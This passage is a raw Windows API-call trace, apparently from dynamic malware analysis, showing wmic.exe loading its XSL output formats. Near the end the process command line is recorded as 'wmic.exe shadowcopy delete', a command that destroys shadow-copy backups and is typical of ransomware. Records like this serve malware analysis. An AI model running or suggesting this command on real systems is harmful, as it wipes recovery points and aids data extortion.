IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5299fa8, name="KEYWORD", namedItem=0x4edfaa4 | out: namedItem=0x4edfaa4*=0x5299ff8) returned 0x0 [0107.454] IXMLDOMNode:get_nodeValue (in: This=0x5299ff8, value=0x4edfa64 | out: value=0x4edfa64*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x0)) returned 0x0 [0107.454] SysStringLen (param_1="HTABLE") returned 0x6 [0107.454] SysStringLen (param_1="TABLE") returned 0x5 [0107.454] SysStringLen (param_1="HTABLE") returned 0x6 [0107.454] SysStringLen (param_1="LIST") returned 0x4 [0107.454] IUnknown:Release (This=0x5296b88) returned 0x0 [0107.454] IUnknown:Release (This=0x5299fa8) returned 0x0 [0107.455] IUnknown:Release (This=0x5299ff8) returned 0x0 [0107.455] IXMLDOMNodeList:get_item (in: This=0x5299ca0, index=5, listItem=0x4edfaac | out: listItem=0x4edfaac*=0x5296b88) returned 0x0 [0107.455] IXMLDOMNode:get_text (in: This=0x5296b88, text=0x4edfab0 | out: text=0x4edfab0*="hform.xsl") returned 0x0 [0107.455] IXMLDOMNode:get_attributes (in: This=0x5296b88, attributeMap=0x4edfaa8 | out: attributeMap=0x4edfaa8*=0x5299fa8) returned 0x0 [0107.455] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5299fa8, name="KEYWORD", namedItem=0x4edfaa4 | out: namedItem=0x4edfaa4*=0x5299ff8) returned 0x0 [0107.455] IXMLDOMNode:get_nodeValue (in: This=0x5299ff8, value=0x4edfa64 | out: value=0x4edfa64*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x0)) returned 0x0 [0107.455] SysStringLen (param_1="HFORM") returned 0x5 [0107.455] SysStringLen (param_1="TABLE") returned 0x5 [0107.455] SysStringLen (param_1="HFORM") returned 0x5 [0107.455] SysStringLen (param_1="LIST") returned 0x4 [0107.455] SysStringLen (param_1="HFORM") returned 0x5 [0107.455] SysStringLen (param_1="HTABLE") returned 0x6 [0107.455] IUnknown:Release (This=0x5296b88) returned 0x0 [0107.455] IUnknown:Release (This=0x5299fa8) returned 0x0 [0107.455] IUnknown:Release (This=0x5299ff8) returned 0x0 [0107.455] IXMLDOMNodeList:get_item (in: This=0x5299ca0, index=6, listItem=0x4edfaac | out: listItem=0x4edfaac*=0x5296b88) returned 0x0 [0107.455] IXMLDOMNode:get_text (in: This=0x5296b88, text=0x4edfab0 | out: text=0x4edfab0*="xml.xsl") returned 0x0 [0107.455] IXMLDOMNode:get_attributes (in: This=0x5296b88, attributeMap=0x4edfaa8 | out: attributeMap=0x4edfaa8*=0x5299fa8) returned 0x0 [0107.455] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5299fa8, name="KEYWORD", namedItem=0x4edfaa4 | out: namedItem=0x4edfaa4*=0x5299ff8) returned 0x0 [0107.456] IXMLDOMNode:get_nodeValue (in: This=0x5299ff8, value=0x4edfa64 | out: value=0x4edfa64*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x0)) returned 0x0 [0107.456] SysStringLen (param_1="XML") returned 0x3 [0107.456] SysStringLen (param_1="TABLE") returned 0x5 [0107.456] SysStringLen (param_1="XML") returned 0x3 [0107.456] SysStringLen (param_1="VALUE") returned 0x5 [0107.456] SysStringLen (param_1="VALUE") returned 0x5 [0107.456] SysStringLen (param_1="XML") returned 0x3 [0107.456] IUnknown:Release (This=0x5296b88) returned 0x0 [0107.456] IUnknown:Release (This=0x5299fa8) returned 0x0 [0107.456] IUnknown:Release (This=0x5299ff8) returned 0x0 [0107.456] IXMLDOMNodeList:get_item (in: This=0x5299ca0, index=7, listItem=0x4edfaac | out: listItem=0x4edfaac*=0x5296b88) returned 0x0 [0107.456] IXMLDOMNode:get_text (in: This=0x5296b88, text=0x4edfab0 | out: text=0x4edfab0*="mof.xsl") returned 0x0 [0107.456] IXMLDOMNode:get_attributes (in: This=0x5296b88, attributeMap=0x4edfaa8 | out: attributeMap=0x4edfaa8*=0x5299fa8) returned 0x0 [0107.456] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5299fa8, name="KEYWORD", namedItem=0x4edfaa4 | out: namedItem=0x4edfaa4*=0x5299ff8) returned 0x0 [0107.456] IXMLDOMNode:get_nodeValue (in: This=0x5299ff8, value=0x4edfa64 | out: value=0x4edfa64*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x0)) returned 0x0 [0107.456] SysStringLen (param_1="MOF") returned 0x3 [0107.456] SysStringLen (param_1="TABLE") returned 0x5 [0107.456] SysStringLen (param_1="MOF") returned 0x3 [0107.456] SysStringLen (param_1="LIST") returned 0x4 [0107.456] SysStringLen (param_1="MOF") returned 0x3 [0107.456] SysStringLen (param_1="RAWXML") returned 0x6 [0107.456] SysStringLen (param_1="LIST") returned 0x4 [0107.456] SysStringLen (param_1="MOF") returned 0x3 [0107.456] IUnknown:Release (This=0x5296b88) returned 0x0 [0107.457] IUnknown:Release (This=0x5299fa8) returned 0x0 [0107.457] IUnknown:Release (This=0x5299ff8) returned 0x0 [0107.457] IXMLDOMNodeList:get_item (in: This=0x5299ca0, index=8, listItem=0x4edfaac | out: listItem=0x4edfaac*=0x5296b88) returned 0x0 [0107.457] IXMLDOMNode:get_text (in: This=0x5296b88, text=0x4edfab0 | out: text=0x4edfab0*="csv.xsl") returned 0x0 [0107.457] IXMLDOMNode:get_attributes (in: This=0x5296b88, attributeMap=0x4edfaa8 | out: attributeMap=0x4edfaa8*=0x5299fa8) returned 0x0 [0107.457] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5299fa8, name="KEYWORD", namedItem=0x4edfaa4 | out: namedItem=0x4edfaa4*=0x5299ff8) returned 0x0 [0107.457] IXMLDOMNode:get_nodeValue (in: This=0x5299ff8, value=0x4edfa64 | out: value=0x4edfa64*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x0)) returned 0x0 [0107.457] SysStringLen (param_1="CSV") returned 0x3 [0107.457] SysStringLen (param_1="TABLE") returned 0x5 [0107.457] SysStringLen (param_1="CSV") returned 0x3 [0107.457] SysStringLen (param_1="LIST") returned 0x4 [0107.457] SysStringLen (param_1="CSV") returned 0x3 [0107.457] SysStringLen (param_1="HTABLE") returned 0x6 [0107.457] SysStringLen (param_1="CSV") returned 0x3 [0107.457] SysStringLen (param_1="HFORM") returned 0x5 [0107.457] IUnknown:Release (This=0x5296b88) returned 0x0 [0107.457] IUnknown:Release (This=0x5299fa8) returned 0x0 [0107.457] IUnknown:Release (This=0x5299ff8) returned 0x0 [0107.457] IXMLDOMNodeList:get_item (in: This=0x5299ca0, index=9, listItem=0x4edfaac | out: listItem=0x4edfaac*=0x5296b88) returned 0x0 [0107.457] IXMLDOMNode:get_text (in: This=0x5296b88, text=0x4edfab0 | out: text=0x4edfab0*="texttable.xsl") returned 0x0 [0107.457] IXMLDOMNode:get_attributes (in: This=0x5296b88, attributeMap=0x4edfaa8 | out: attributeMap=0x4edfaa8*=0x5299fa8) returned 0x0 [0107.457] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5299fa8, name="KEYWORD", namedItem=0x4edfaa4 | out: namedItem=0x4edfaa4*=0x5299ff8) returned 0x0 [0107.458] IXMLDOMNode:get_nodeValue (in: This=0x5299ff8, value=0x4edfa64 | out: value=0x4edfa64*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x0)) returned 0x0 [0107.458] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0107.458] SysStringLen (param_1="TABLE") returned 0x5 [0107.458] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0107.458] SysStringLen (param_1="VALUE") returned 0x5 [0107.458] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0107.458] SysStringLen (param_1="XML") returned 0x3 [0107.458] SysStringLen (param_1="XML") returned 0x3 [0107.458] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0107.458] IUnknown:Release (This=0x5296b88) returned 0x0 [0107.458] IUnknown:Release (This=0x5299fa8) returned 0x0 [0107.458] IUnknown:Release (This=0x5299ff8) returned 0x0 [0107.458] IXMLDOMNodeList:get_item (in: This=0x5299ca0, index=10, listItem=0x4edfaac | out: listItem=0x4edfaac*=0x5296b88) returned 0x0 [0107.458] IXMLDOMNode:get_text (in: This=0x5296b88, text=0x4edfab0 | out: text=0x4edfab0*="texttable.xsl") returned 0x0 [0107.458] IXMLDOMNode:get_attributes (in: This=0x5296b88, attributeMap=0x4edfaa8 | out: attributeMap=0x4edfaa8*=0x5299fa8) returned 0x0 [0107.458] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5299fa8, name="KEYWORD", namedItem=0x4edfaa4 | out: namedItem=0x4edfaa4*=0x5299ff8) returned 0x0 [0107.458] IXMLDOMNode:get_nodeValue (in: This=0x5299ff8, value=0x4edfa64 | out: value=0x4edfa64*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x0)) returned 0x0 [0107.458] SysStringLen (param_1="texttablewsys") returned 0xd [0107.458] SysStringLen (param_1="TABLE") returned 0x5 [0107.458] SysStringLen (param_1="texttablewsys") returned 0xd [0107.458] SysStringLen (param_1="XML") returned 0x3 [0107.458] SysStringLen (param_1="texttablewsys") returned 0xd [0107.458] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0107.458] SysStringLen (param_1="XML") returned 0x3 [0107.459] SysStringLen (param_1="texttablewsys") returned 0xd [0107.459] IUnknown:Release (This=0x5296b88) returned 0x0 [0107.459] IUnknown:Release (This=0x5299fa8) returned 0x0 [0107.459] IUnknown:Release (This=0x5299ff8) returned 0x0 [0107.459] IXMLDOMNodeList:get_item (in: This=0x5299ca0, index=11, listItem=0x4edfaac | out: listItem=0x4edfaac*=0x5296b88) returned 0x0 [0107.459] IXMLDOMNode:get_text (in: This=0x5296b88, text=0x4edfab0 | out: text=0x4edfab0*="texttable.xsl") returned 0x0 [0107.459] IXMLDOMNode:get_attributes (in: This=0x5296b88, attributeMap=0x4edfaa8 | out: attributeMap=0x4edfaa8*=0x5299fa8) returned 0x0 [0107.459] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5299fa8, name="KEYWORD", namedItem=0x4edfaa4 | out: namedItem=0x4edfaa4*=0x5299ff8) returned 0x0 [0107.459] IXMLDOMNode:get_nodeValue (in: This=0x5299ff8, value=0x4edfa64 | out: value=0x4edfa64*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x0)) returned 0x0 [0107.459] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0107.459] SysStringLen (param_1="TABLE") returned 0x5 [0107.459] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0107.459] SysStringLen (param_1="XML") returned 0x3 [0107.459] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0107.459] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0107.459] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0107.459] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0107.459] IUnknown:Release (This=0x5296b88) returned 0x0 [0107.459] IUnknown:Release (This=0x5299fa8) returned 0x0 [0107.459] IUnknown:Release (This=0x5299ff8) returned 0x0 [0107.459] IXMLDOMNodeList:get_item (in: This=0x5299ca0, index=12, listItem=0x4edfaac | out: listItem=0x4edfaac*=0x5296b88) returned 0x0 [0107.459] IXMLDOMNode:get_text (in: This=0x5296b88, text=0x4edfab0 | out: text=0x4edfab0*="texttable.xsl") returned 0x0 [0107.459] IXMLDOMNode:get_attributes (in: This=0x5296b88, attributeMap=0x4edfaa8 | out: attributeMap=0x4edfaa8*=0x5299fa8) returned 0x0 [0107.460] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5299fa8, name="KEYWORD", namedItem=0x4edfaa4 | out: namedItem=0x4edfaa4*=0x5299ff8) returned 0x0 [0107.460] IXMLDOMNode:get_nodeValue (in: This=0x5299ff8, value=0x4edfa64 | out: value=0x4edfa64*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x0)) returned 0x0 [0107.460] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0107.460] SysStringLen (param_1="TABLE") returned 0x5 [0107.460] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0107.460] SysStringLen (param_1="XML") returned 0x3 [0107.460] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0107.460] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0107.460] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0107.460] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0107.460] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0107.460] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0107.460] IUnknown:Release (This=0x5296b88) returned 0x0 [0107.460] IUnknown:Release (This=0x5299fa8) returned 0x0 [0107.460] IUnknown:Release (This=0x5299ff8) returned 0x0 [0107.460] IXMLDOMNodeList:get_item (in: This=0x5299ca0, index=13, listItem=0x4edfaac | out: listItem=0x4edfaac*=0x5296b88) returned 0x0 [0107.460] IXMLDOMNode:get_text (in: This=0x5296b88, text=0x4edfab0 | out: text=0x4edfab0*="texttable.xsl") returned 0x0 [0107.460] IXMLDOMNode:get_attributes (in: This=0x5296b88, attributeMap=0x4edfaa8 | out: attributeMap=0x4edfaa8*=0x5299fa8) returned 0x0 [0107.461] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5299fa8, name="KEYWORD", namedItem=0x4edfaa4 | out: namedItem=0x4edfaa4*=0x5299ff8) returned 0x0 [0107.461] IXMLDOMNode:get_nodeValue (in: This=0x5299ff8, value=0x4edfa64 | out: value=0x4edfa64*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x0)) returned 0x0 [0107.461] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0107.461] SysStringLen (param_1="TABLE") returned 0x5 [0107.461] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0107.461] SysStringLen (param_1="XML") returned 0x3 [0107.461] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0107.461] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0107.461] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0107.461] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0107.461] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0107.461] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0107.461] IUnknown:Release (This=0x5296b88) returned 0x0 [0107.461] IUnknown:Release (This=0x5299fa8) returned 0x0 [0107.461] IUnknown:Release (This=0x5299ff8) returned 0x0 [0107.461] IXMLDOMNodeList:get_item (in: This=0x5299ca0, index=14, listItem=0x4edfaac | out: listItem=0x4edfaac*=0x5296b88) returned 0x0 [0107.461] IXMLDOMNode:get_text (in: This=0x5296b88, text=0x4edfab0 | out: text=0x4edfab0*="texttable.xsl") returned 0x0 [0107.461] IXMLDOMNode:get_attributes (in: This=0x5296b88, attributeMap=0x4edfaa8 | out: attributeMap=0x4edfaa8*=0x5299fa8) returned 0x0 [0107.462] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5299fa8, name="KEYWORD", namedItem=0x4edfaa4 | out: namedItem=0x4edfaa4*=0x5299ff8) returned 0x0 [0107.462] IXMLDOMNode:get_nodeValue (in: This=0x5299ff8, value=0x4edfa64 | out: value=0x4edfa64*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x0)) returned 0x0 [0107.462] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0107.462] SysStringLen (param_1="TABLE") returned 0x5 [0107.462] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0107.462] SysStringLen (param_1="XML") returned 0x3 [0107.462] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0107.462] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0107.462] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0107.462] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0107.462] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0107.462] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0107.462] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0107.462] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0107.462] IUnknown:Release (This=0x5296b88) returned 0x0 [0107.462] IUnknown:Release (This=0x5299fa8) returned 0x0 [0107.462] IUnknown:Release (This=0x5299ff8) returned 0x0 [0107.462] IXMLDOMNodeList:get_item (in: This=0x5299ca0, index=15, listItem=0x4edfaac | out: listItem=0x4edfaac*=0x5296b88) returned 0x0 [0107.462] IXMLDOMNode:get_text (in: This=0x5296b88, text=0x4edfab0 | out: text=0x4edfab0*="htable.xsl") returned 0x0 [0107.462] IXMLDOMNode:get_attributes (in: This=0x5296b88, attributeMap=0x4edfaa8 | out: attributeMap=0x4edfaa8*=0x5299fa8) returned 0x0 [0107.462] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5299fa8, name="KEYWORD", namedItem=0x4edfaa4 | out: namedItem=0x4edfaa4*=0x5299ff8) returned 0x0 [0107.462] IXMLDOMNode:get_nodeValue (in: This=0x5299ff8, value=0x4edfa64 | out: value=0x4edfa64*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x0)) returned 0x0 [0107.462] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0107.463] SysStringLen (param_1="TABLE") returned 0x5 [0107.463] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0107.463] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0107.463] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0107.463] SysStringLen (param_1="XML") returned 0x3 [0107.463] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0107.463] SysStringLen (param_1="texttablewsys") returned 0xd [0107.463] SysStringLen (param_1="XML") returned 0x3 [0107.463] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0107.463] IUnknown:Release (This=0x5296b88) returned 0x0 [0107.463] IUnknown:Release (This=0x5299fa8) returned 0x0 [0107.463] IUnknown:Release (This=0x5299ff8) returned 0x0 [0107.463] IXMLDOMNodeList:get_item (in: This=0x5299ca0, index=16, listItem=0x4edfaac | out: listItem=0x4edfaac*=0x5296b88) returned 0x0 [0107.463] IXMLDOMNode:get_text (in: This=0x5296b88, text=0x4edfab0 | out: text=0x4edfab0*="htable.xsl") returned 0x0 [0107.463] IXMLDOMNode:get_attributes (in: This=0x5296b88, attributeMap=0x4edfaa8 | out: attributeMap=0x4edfaa8*=0x5299fa8) returned 0x0 [0107.463] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5299fa8, name="KEYWORD", namedItem=0x4edfaa4 | out: namedItem=0x4edfaa4*=0x5299ff8) returned 0x0 [0107.463] IXMLDOMNode:get_nodeValue (in: This=0x5299ff8, value=0x4edfa64 | out: value=0x4edfa64*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x0)) returned 0x0 [0107.463] SysStringLen (param_1="htable-sortby") returned 0xd [0107.463] SysStringLen (param_1="TABLE") returned 0x5 [0107.463] SysStringLen (param_1="htable-sortby") returned 0xd [0107.463] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0107.463] SysStringLen (param_1="htable-sortby") returned 0xd [0107.463] SysStringLen (param_1="XML") returned 0x3 [0107.463] SysStringLen (param_1="htable-sortby") returned 0xd [0107.463] SysStringLen (param_1="texttablewsys") returned 0xd [0107.463] SysStringLen (param_1="htable-sortby") returned 0xd [0107.463] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0107.463] SysStringLen (param_1="XML") returned 0x3 [0107.463] SysStringLen (param_1="htable-sortby") returned 0xd [0107.464] IUnknown:Release (This=0x5296b88) returned 0x0 [0107.464] IUnknown:Release (This=0x5299fa8) returned 0x0 [0107.464] IUnknown:Release (This=0x5299ff8) returned 0x0 [0107.464] IXMLDOMNodeList:get_item (in: This=0x5299ca0, index=17, listItem=0x4edfaac | out: listItem=0x4edfaac*=0x5296b88) returned 0x0 [0107.464] IXMLDOMNode:get_text (in: This=0x5296b88, text=0x4edfab0 | out: text=0x4edfab0*="mof.xsl") returned 0x0 [0107.464] IXMLDOMNode:get_attributes (in: This=0x5296b88, attributeMap=0x4edfaa8 | out: attributeMap=0x4edfaa8*=0x5299fa8) returned 0x0 [0107.464] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5299fa8, name="KEYWORD", namedItem=0x4edfaa4 | out: namedItem=0x4edfaa4*=0x5299ff8) returned 0x0 [0107.464] IXMLDOMNode:get_nodeValue (in: This=0x5299ff8, value=0x4edfa64 | out: value=0x4edfa64*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x0)) returned 0x0 [0107.464] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0107.464] SysStringLen (param_1="TABLE") returned 0x5 [0107.464] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0107.464] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0107.464] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0107.464] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0107.464] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0107.464] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0107.464] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0107.464] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0107.464] IUnknown:Release (This=0x5296b88) returned 0x0 [0107.464] IUnknown:Release (This=0x5299fa8) returned 0x0 [0107.464] IUnknown:Release (This=0x5299ff8) returned 0x0 [0107.464] IXMLDOMNodeList:get_item (in: This=0x5299ca0, index=18, listItem=0x4edfaac | out: listItem=0x4edfaac*=0x5296b88) returned 0x0 [0107.464] IXMLDOMNode:get_text (in: This=0x5296b88, text=0x4edfab0 | out: text=0x4edfab0*="mof.xsl") returned 0x0 [0107.464] IXMLDOMNode:get_attributes (in: This=0x5296b88, attributeMap=0x4edfaa8 | out: attributeMap=0x4edfaa8*=0x5299fa8) returned 0x0 [0107.465] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5299fa8, name="KEYWORD", namedItem=0x4edfaa4 | out: namedItem=0x4edfaa4*=0x5299ff8) returned 0x0 [0107.465] IXMLDOMNode:get_nodeValue (in: This=0x5299ff8, value=0x4edfa64 | out: value=0x4edfa64*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x0)) returned 0x0 [0107.465] SysStringLen (param_1="wmiclimofformat") returned 0xf [0107.465] SysStringLen (param_1="TABLE") returned 0x5 [0107.465] SysStringLen (param_1="wmiclimofformat") returned 0xf [0107.465] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0107.465] SysStringLen (param_1="wmiclimofformat") returned 0xf [0107.465] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0107.465] SysStringLen (param_1="wmiclimofformat") returned 0xf [0107.465] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0107.465] SysStringLen (param_1="wmiclimofformat") returned 0xf [0107.465] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0107.465] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0107.465] SysStringLen (param_1="wmiclimofformat") returned 0xf [0107.465] IUnknown:Release (This=0x5296b88) returned 0x0 [0107.465] IUnknown:Release (This=0x5299fa8) returned 0x0 [0107.465] IUnknown:Release (This=0x5299ff8) returned 0x0 [0107.465] IXMLDOMNodeList:get_item (in: This=0x5299ca0, index=19, listItem=0x4edfaac | out: listItem=0x4edfaac*=0x5296b88) returned 0x0 [0107.465] IXMLDOMNode:get_text (in: This=0x5296b88, text=0x4edfab0 | out: text=0x4edfab0*="textvaluelist.xsl") returned 0x0 [0107.465] IXMLDOMNode:get_attributes (in: This=0x5296b88, attributeMap=0x4edfaa8 | out: attributeMap=0x4edfaa8*=0x5299fa8) returned 0x0 [0107.465] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5299fa8, name="KEYWORD", namedItem=0x4edfaa4 | out: namedItem=0x4edfaa4*=0x5299ff8) returned 0x0 [0107.465] IXMLDOMNode:get_nodeValue (in: This=0x5299ff8, value=0x4edfa64 | out: value=0x4edfa64*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x0)) returned 0x0 [0107.466] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0107.466] SysStringLen (param_1="TABLE") returned 0x5 [0107.466] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0107.466] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0107.466] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0107.466] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0107.466] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0107.466] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0107.466] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0107.466] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0107.466] IUnknown:Release (This=0x5296b88) returned 0x0 [0107.466] IUnknown:Release (This=0x5299fa8) returned 0x0 [0107.466] IUnknown:Release (This=0x5299ff8) returned 0x0 [0107.466] IXMLDOMNodeList:get_item (in: This=0x5299ca0, index=20, listItem=0x4edfaac | out: listItem=0x4edfaac*=0x5296b88) returned 0x0 [0107.466] IXMLDOMNode:get_text (in: This=0x5296b88, text=0x4edfab0 | out: text=0x4edfab0*="textvaluelist.xsl") returned 0x0 [0107.466] IXMLDOMNode:get_attributes (in: This=0x5296b88, attributeMap=0x4edfaa8 | out: attributeMap=0x4edfaa8*=0x5299fa8) returned 0x0 [0107.466] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5299fa8, name="KEYWORD", namedItem=0x4edfaa4 | out: namedItem=0x4edfaa4*=0x5299ff8) returned 0x0 [0107.466] IXMLDOMNode:get_nodeValue (in: This=0x5299ff8, value=0x4edfa64 | out: value=0x4edfa64*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x0)) returned 0x0 [0107.466] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0107.466] SysStringLen (param_1="TABLE") returned 0x5 [0107.466] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0107.466] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0107.466] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0107.466] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0107.466] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0107.466] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0107.466] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0107.466] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0107.466] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0107.466] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0107.467] IUnknown:Release (This=0x5296b88) returned 0x0 [0107.467] IUnknown:Release (This=0x5299fa8) returned 0x0 [0107.467] IUnknown:Release (This=0x5299ff8) returned 0x0 [0107.467] IUnknown:Release (This=0x5299ca0) returned 0x0 [0107.467] FreeThreadedDOMDocument:IUnknown:Release (This=0x5296b48) returned 0x1 [0107.467] FreeThreadedDOMDocument:IUnknown:Release (This=0x52945a8) returned 0x0 [0107.467] GetCommandLineW () returned="\"C:\\Windows\\system32\\wbem\\wmic.exe\" shadowcopy delete" [0107.468] memcpy_s (in: _Destination=0x5328838, _DestinationSize=0x6e, _Source=0x50f1528, _SourceSize=0x6a | out: _Destination=0x5328838) returned 0x0 [0107.468] GetLocalTime (in: lpSystemTime=0x4edfa44 | out: lpSystemTime=0x4edfa44*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x2, wDay=0x13, wHour=0x4, wMinute=0x13, wSecond=0x34, wMilliseconds=0x30e)) [0107.468] _vsnwprintf (in: _Buffer=0x53288b0, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x4edfa24 | out: _Buffer="02-19-2019T04:19:52") returned 19 [0107.468] lstrlenW (lpString=" shadowcopy delete") returned 18 [0107.468] lstrlenW (lpString=" shadowcopy delete") returned 18 [0107.468] lstrlenW (lpString=" shadowcopy delete") returned 18 [0107.468] lstrlenW (lpString=" shadowcopy delete") returned 18 [0107.468] lstrlenW (lpString=" shadowcopy delete") returned 18 [0107.468] lstrlenW (lpString=" shadowcopy delete") returned 18 [0107.468] lstrlenW (lpString="shadowcopy") returned 10 [0107.468] _wcsicmp (_String1="shadowcopy", _String2="\"NULL\"") returned 81 [0107.468] lstrlenW (lpString=" shadowcopy delete") returned 18 [0107.468] lstrlenW (lpString="delete") returned 6 [0107.468] _wcsicmp 